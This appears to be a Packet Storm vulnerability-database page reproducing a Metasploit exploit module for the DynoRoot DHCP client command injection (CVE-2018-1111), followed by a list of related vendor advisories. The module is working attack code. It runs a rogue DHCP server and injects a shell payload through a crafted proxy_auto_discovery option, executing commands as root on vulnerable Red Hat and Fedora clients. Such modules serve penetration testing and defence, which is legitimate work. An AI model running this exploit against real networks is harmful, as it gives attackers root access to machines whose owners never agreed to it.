Lucene search
Felix WilhelmPACKETSTORM:148172HistoryJun 12, 2018 - 12:00 a.m.
DHCP Client Command Injection (DynoRoot)
2018-06-1200:00:00
Felix Wilhelm
packetstormsecurity.com
84
0.973 High
EPSS
Percentile
99.8%
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::DHCPServer
def initialize(info = {})
super(update_info(info,
'Name' => 'DHCP Client Command Injection (DynoRoot)',
'Description' => %q{
This module exploits the DynoRoot vulnerability, a flaw in how the
NetworkManager integration script included in the DHCP client in
Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
processes DHCP options. A malicious DHCP server, or an attacker on
the local network able to spoof DHCP responses, could use this flaw
to execute arbitrary commands with root privileges on systems using
NetworkManager and configured to obtain network configuration using
the DHCP protocol.
},
'Author' =>
[
'Felix Wilhelm', # Vulnerability discovery
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'References' =>
[
['AKA', 'DynoRoot'],
['CVE', '2018-1111'],
['EDB': '44652'],
['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
['URL', 'https://dynoroot.ninja/'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
],
'Targets' => [ [ 'Automatic Target', { }] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 15 2018'
))
deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
end
def exploit
hash = datastore.copy
start_service(hash)
@dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
begin
while @dhcp.thread.alive?
sleep 2
end
ensure
stop_service
end
end
end
`
Related
nessus
nessus
Fedora 28 : 12:dhcp (2018-23ca7a6798)
2019-01-03 00:00:00
Oracle Linux 6 : dhcp (ELSA-2018-1454)
2018-05-16 00:00:00
CentOS 7 : dhcp (CESA-2018:1453)
2018-05-16 00:00:00
ibm
ibm
thn
thn
Red Hat Linux DHCP Client Found Vulnerable to Command Injection Attacks
2018-05-15 20:31:00
openvas
openvas
CentOS Update for dhclient CESA-2018:1453 centos7
2018-05-16 00:00:00
Fedora Update for dhcp FEDORA-2018-23ca7a6798
2018-05-16 00:00:00
Huawei EulerOS: Security Advisory for dhcp (EulerOS-SA-2018-1188)
2020-01-23 00:00:00
redhat
redhat
(RHSA-2018:1454) Critical: dhcp security update
2018-05-15 12:14:46
(RHSA-2018:1458) Critical: dhcp security update
2018-05-15 12:14:50
(RHSA-2018:1461) Critical: dhcp security update
2018-05-15 12:14:58
saint
saint
Red Hat DHCP client NetworkManager integration script command injection
2018-05-18 00:00:00
Red Hat DHCP client NetworkManager integration script command injection
2018-05-18 00:00:00
Red Hat DHCP client NetworkManager integration script command injection
2018-05-18 00:00:00
prion
prion
Command injection
2018-05-17 16:29:00
amazon
amazon
Critical: dhcp
2018-05-24 18:04:00
Low: dhcp
2018-05-25 18:16:00
checkpoint_advisories
checkpoint_advisories
Red Hat Linux DHCP Client Command Injection (CVE-2018-1111)
2018-05-21 00:00:00
Red Hat NetworkManager DHCP Command Injection (CVE-2018-1111)
2019-01-14 00:00:00
veracode
veracode
Arbitrary Command Execution
2019-01-15 09:22:09
f5
f5
K32541890 : DHCP Client Script Code Execution vulnerability CVE-2018-1111
2018-05-25 00:00:00
oraclelinux
oraclelinux
dhcp security update
2018-05-15 00:00:00
dhcp security update
2018-05-15 00:00:00
dhcp security and bug fix update
2019-08-13 00:00:00
zdt
zdt
DHCP Client - Command Injection (DynoRoot) Exploit
2018-06-13 00:00:00
DynoRoot DHCP - Client Command Injection Exploit
2018-05-18 00:00:00
redhatcve
redhatcve
CVE-2018-1111
2019-10-10 06:14:07
centos
centos
dhclient, dhcp security update
2018-05-15 15:51:39
dhclient, dhcp security update
2018-05-15 17:32:34
cve
cve
CVE-2018-1111
2018-05-17 16:29:00
fedora
fedora
[SECURITY] Fedora 26 Update: dhcp-4.3.5-11.fc26
2018-05-16 13:13:51
[SECURITY] Fedora 28 Update: dhcp-4.3.6-20.fc28
2018-05-15 14:48:04
[SECURITY] Fedora 27 Update: dhcp-4.3.6-10.fc27
2018-05-15 15:28:58
metasploit
metasploit
DHCP Client Command Injection (DynoRoot)
2018-05-18 16:47:08
seebug
seebug
DHCP Client Script Code Execution Vulnerability(CVE-2018-1111)
2018-05-16 00:00:00
packetstorm
packetstorm
DynoRoot DHCP Command Injection
2018-05-18 00:00:00
exploitpack
exploitpack
DynoRoot DHCP Client - Command Injection
2018-05-18 00:00:00
exploitdb
exploitdb
DHCP Client - Command Injection 'DynoRoot' (Metasploit)
2018-06-13 00:00:00
DynoRoot DHCP Client - Command Injection
2018-05-18 00:00:00
trendmicroblog
trendmicroblog